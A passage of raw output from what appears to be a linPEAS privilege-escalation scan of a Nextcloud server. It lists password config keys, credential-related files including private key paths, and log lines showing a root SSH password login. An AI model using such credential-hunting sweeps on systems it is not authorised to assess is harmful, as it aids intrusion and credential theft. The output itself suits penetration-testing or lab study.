* 'passwordsalt' => 'd3c944a9af095aa08f',
* to require a password. See http://redis.io/topics/security
'auth.storeCryptedPassword' => true,
'dbpassword' => '',
'dbuser' => '',
'hashing_default_password' => false,
'lost_password_link' => 'https://example.org/link/to/password/reset',
'mail_smtppassword' => '',
'passwordsalt' => '',
'proxyuserpwd' => '',
'sharing.allow_disabled_password_enforcement_groups' => false,
'sharing.enable_mail_link_password_expiration' => false,
'sharing.mail_link_password_expiration_interval' => 3600,

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/password-auth
/etc/pki/tls/private/localhost.key
/etc/pki/tls/private/nextcloud.key
/home/echo.rivers/.gnupg/private-keys-v1.d/5DB4D1317999333A618EBC8798B2C12A1A17F101.key
/home/echo.rivers/.gnupg/private-keys-v1.d/ED1F31222B3549CF9D0A5B8224AA600251DE1E3A.key
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/include/php/ext/standard/php_password.h
/usr/lib/dracut/modules.d/01systemd-ask-password
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder

/usr/lib64/mariadb/plugin/caching_sha2_password.so
/usr/lib64/mariadb/plugin/mysql_clear_password.so
/usr/lib64/mariadb/plugin/sha256_password.so
/usr/lib64/mariadb/plugin/simple_password_check.so
#)There are more creds/passwds files in the previous parent folder

/usr/sbin/grub2-setpassword
/usr/share/authselect/default/minimal/password-auth
/usr/share/authselect/default/sssd/password-auth
/usr/share/authselect/default/winbind/password-auth
/usr/share/doc/openssh/PROTOCOL.key
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man3/OSSL_DECODER_CTX_set_pem_password_cb.3ossl.gz
/usr/share/man/man3/OSSL_ENCODER_CTX_set_pem_password_cb.3ossl.gz
/usr/share/man/man3/SSL_CTX_set_srp_password.3ossl.gz
/usr/share/man/man3/pem_password_cb.3ossl.gz
#)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/systemd.system-credentials.7.gz
/usr/share/man/man8/grub2-set-password.8.gz
/usr/share/man/man8/grub2-setpassword.8.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
#)There are more creds/passwds files in the previous parent folder

/var/lib/mysql/nextclouddb/oc_storages_credentials.ibd
/var/www/html/nextcloud/3rdparty/aws/aws-crt-php/ext/credentials.c
/var/www/html/nextcloud/3rdparty/thecodingmachine/safe/generated/password.php
/var/www/html/nextcloud/apps/files_external/js/templates/credentialsDialog.handlebars
/var/www/html/nextcloud/apps/password_policy
/var/www/html/nextcloud/apps/password_policy/js/password_policy-settings.js
/var/www/html/nextcloud/apps/password_policy/js/password_policy-settings.js.LICENSE.txt
/var/www/html/nextcloud/apps/password_policy/js/password_policy-settings.js.map
/var/www/html/nextcloud/apps/password_policy/templates/settings.php
/var/www/html/nextcloud/apps/settings/img/password.svg
/var/www/html/nextcloud/apps/settings/js/security_password.js
/var/www/html/nextcloud/apps/settings/templates/settings/personal/security/password.php
/var/www/html/nextcloud/apps/user_ldap/templates/renewpassword.php
/var/www/html/nextcloud/core/doc/admin/_images/user_password_policy_configuration_app.png
/var/www/html/nextcloud/core/doc/admin/_sources/configuration_user/reset_admin_password.rst.txt
/var/www/html/nextcloud/core/doc/admin/_sources/configuration_user/reset_user_password.rst.txt
/var/www/html/nextcloud/core/doc/admin/_sources/configuration_user/user_password_policy.rst.txt
/var/www/html/nextcloud/core/doc/admin/configuration_user/reset_admin_password.html
/var/www/html/nextcloud/core/doc/admin/configuration_user/reset_user_password.html
/var/www/html/nextcloud/core/doc/admin/configuration_user/user_password_policy.html
/var/www/html/nextcloud/core/doc/user/_images/korganizer_credentials.png
/var/www/html/nextcloud/core/img/actions/password-white.svg
/var/www/html/nextcloud/core/img/actions/password.png
/var/www/html/nextcloud/core/img/actions/password.svg

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
Jul 5 09:49:25 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:56 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:56 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 5 09:49:57 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:57 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 08:23:11 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:38 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:38 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 08:23:39 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:39 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 08:24:15 nextcloud sshd[926]: Accepted password for root from 172.16.20.1 port 49752 ssh2
Jul 7 14:46:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:58 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:58 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 14:46:59 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:59 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 16:07:04 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:31 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:31 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 16:07:32 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:32 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 18:26:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:58 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:58 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 18:26:59 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:59 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 10 11:32:11 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:37 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:37 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 10 11:32:38 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:38 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 10 11:45:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:01 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:01 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 10 11:46:03 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:03 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 18:59:04 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:46 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:46 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 19:07:48 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:48 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 19:45:34 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:12 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:12 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 19:46:13 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:13 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 23:02:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:07 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:07 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 23:03:08 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:08 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 23:06:20 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:47 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:47 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 23:06:48 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:48 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 07:05:47 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:30 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:30 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 07:08:35 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:35 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 07:37:07 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:09 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:09 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 07:39:12 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:12 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 08:19:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 08:21:30 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 08:21:30 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 08:21:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.



╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'